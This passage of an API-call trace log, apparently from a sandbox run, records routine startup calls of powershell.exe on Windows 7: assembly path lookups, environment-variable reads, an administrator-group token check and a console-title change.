	[0335.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0336.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0336.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0337.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0337.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0338.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0338.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0338.750] CoTaskMemAlloc (cb=0x104) returned 0x1b7ab9c0
	[0338.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7ab9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.750] CoTaskMemFree (pv=0x1b7ab9c0) 
	[0338.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0338.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0338.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0338.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0339.165] SetErrorMode (uMode=0x1) returned 0x1
	[0339.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10d700 | out: lpFileInformation=0x10d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0339.166] SetErrorMode (uMode=0x1) returned 0x1
	[0342.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0342.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.080] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.080] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.084] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.084] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.084] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.084] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.087] CoCreateGuid (in: pguid=0x10dac8 | out: pguid=0x10dac8*(Data1=0xd9e6f73b, Data2=0x8817, Data3=0x4ca1, Data4=([0]=0xb0, [1]=0xb0, [2]=0x86, [3]=0xa5, [4]=0xda, [5]=0x10, [6]=0x2f, [7]=0x45))) returned 0x0
	[0343.090] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.090] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.093] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.093] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.095] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0343.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.095] CoTaskMemFree (pv=0x1b7a89f0) 
	[0343.102] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0343.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10d770 | out: lpConsoleScreenBufferInfo=0x10d770) returned 1
	[0343.109] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0343.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d770 | out: lpConsoleScreenBufferInfo=0x10d770) returned 1
	[0343.110] GetVersionExW (in: lpVersionInformation=0x10d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0343.113] GetCurrentProcess () returned 0xffffffffffffffff
	[0343.114] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x10d798 | out: TokenHandle=0x10d798*=0x318) returned 1
	[0343.118] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d6b8 | out: TokenInformation=0x0, ReturnLength=0x10d6b8) returned 0
	[0343.119] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x317290
	[0343.119] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x317290, TokenInformationLength=0x4, ReturnLength=0x10d6b8 | out: TokenInformation=0x317290, ReturnLength=0x10d6b8) returned 1
	[0343.120] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10d818 | out: phNewToken=0x10d818*=0x314) returned 1
	[0343.120] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d6b8 | out: TokenInformation=0x0, ReturnLength=0x10d6b8) returned 0
	[0343.120] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3172c0
	[0343.120] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x3172c0, TokenInformationLength=0x4, ReturnLength=0x10d6b8 | out: TokenInformation=0x3172c0, ReturnLength=0x10d6b8) returned 1
	[0343.121] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2d6fcf8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10d828 | out: IsMember=0x10d828) returned 1
	[0343.121] CloseHandle (hObject=0x314) returned 1
	[0343.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.693] CoTaskMemAlloc (cb=0x804) returned 0x3cf790
	[0343.694] GetConsoleTitleW (in: lpConsoleTitle=0x3cf790, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0343.694] CoTaskMemFree (pv=0x3cf790) 
	[0343.716] CoTaskMemAlloc (cb=0x804) returned 0x3cf790
	[0343.716] GetConsoleTitleW (in: lpConsoleTitle=0x3cf790, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0343.717] CoTaskMemFree (pv=0x3cf790) 
	[0343.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.719] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0344.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.469] SetConsoleCtrlHandler (HandlerRoutine=0x2bd68dc, Add=1) returned 1
	[0345.488] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0345.491] CoCreateGuid (in: pguid=0x10d910 | out: pguid=0x10d910*(Data1=0x4f49da1a, Data2=0x9f42, Data3=0x46b1, Data4=([0]=0xa0, [1]=0xd0, [2]=0x76, [3]=0xb9, [4]=0x78, [5]=0x8, [6]=0x91, [7]=0x98))) returned 0x0
	[0345.492] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.492] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.798] WinSqmIsOptedIn () returned 0x0
	[0345.799] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.799] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.800] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.800] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.800] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.800] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.801] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.801] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.802] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
